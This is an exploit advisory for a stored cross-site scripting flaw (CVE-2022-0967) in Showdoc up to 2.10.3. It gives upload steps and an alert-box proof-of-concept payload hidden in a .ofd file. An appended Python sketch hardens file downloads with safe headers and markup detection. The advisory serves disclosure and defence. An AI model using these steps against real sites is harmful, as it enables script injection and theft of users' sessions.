Showdoc 2.10.3 Cross Site Scripting

Showdoc versions 2.10.3 and below suffer from a persistent cross site scripting vulnerability.

SHA-256 | 9794c5dc51ff960938f2de93bd6a7f9916dd3f208482681592b1d965acd7691a

# Exploit Title: Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)
# Exploit Author: Akshay Ravi
# Vendor Homepage: https://github.com/star7th/showdoc
# Software Link: https://github.com/star7th/showdoc/releases/tag/v2.10.3
# Version: <= 2.10.3
# Tested on: macOS Monterey
# CVE : CVE-2022-0967

Description: Stored XSS via uploading file in .ofd format

1. Create a file with .ofd extension and add XSS Payload inside the file

filename = "payload.ofd"
payload = "<script>alert(1)</script>"

2. Log in to showdoc v2.10.2 and go to the file library

Endpoint = "https://www.site.com/attachment/index"

3. Upload the payload to the file library and click on the check button
4. The XSS payload will be executed once we visit the URL
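
A defensive sketch for the download side of this issue, added here and not taken from Showdoc or the advisory: it assumes the payload runs because the uploaded .ofd file is returned in a form the browser renders as HTML, and it picks response headers that prevent that. `INLINE_TYPES`, `looks_like_markup` and `download_headers` are hypothetical names, and the list of inline types is an assumption.

```python
import os

# Assumption: the only types this hypothetical app is willing to render inline.
INLINE_TYPES = {
    ".png": "image/png",
    ".jpg": "image/jpeg",
    ".jpeg": "image/jpeg",
    ".gif": "image/gif",
    ".pdf": "application/pdf",
    ".txt": "text/plain; charset=utf-8",
}

# Byte patterns that indicate active content whatever the extension claims.
MARKUP_HINTS = (b"<script", b"<html", b"<svg", b"<iframe", b"javascript:")


def looks_like_markup(data: bytes) -> bool:
    """Check the first 4 KiB of an upload for HTML/script markers."""
    head = data[:4096].lower()
    return any(hint in head for hint in MARKUP_HINTS)


def download_headers(filename: str, data: bytes) -> dict:
    """Return response headers for serving a user-uploaded file."""
    ext = os.path.splitext(filename)[1].lower()
    # Keep only the base name and drop characters that could break the header.
    safe_name = os.path.basename(filename)
    for ch in ('"', "\r", "\n"):
        safe_name = safe_name.replace(ch, "")
    headers = {
        # Stop the browser from guessing a renderable type from the body.
        "X-Content-Type-Options": "nosniff",
        # Even if rendered, no script may run in the response's context.
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }
    ctype = INLINE_TYPES.get(ext)
    if ctype is None or looks_like_markup(data):
        # Unknown extension (such as .ofd) or embedded markup: force download.
        headers["Content-Type"] = "application/octet-stream"
        headers["Content-Disposition"] = f'attachment; filename="{safe_name}"'
    else:
        headers["Content-Type"] = ctype
        headers["Content-Disposition"] = f'inline; filename="{safe_name}"'
    return headers
```

Serving uploads from a separate origin with no session cookies limits the impact further if a file is ever rendered.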
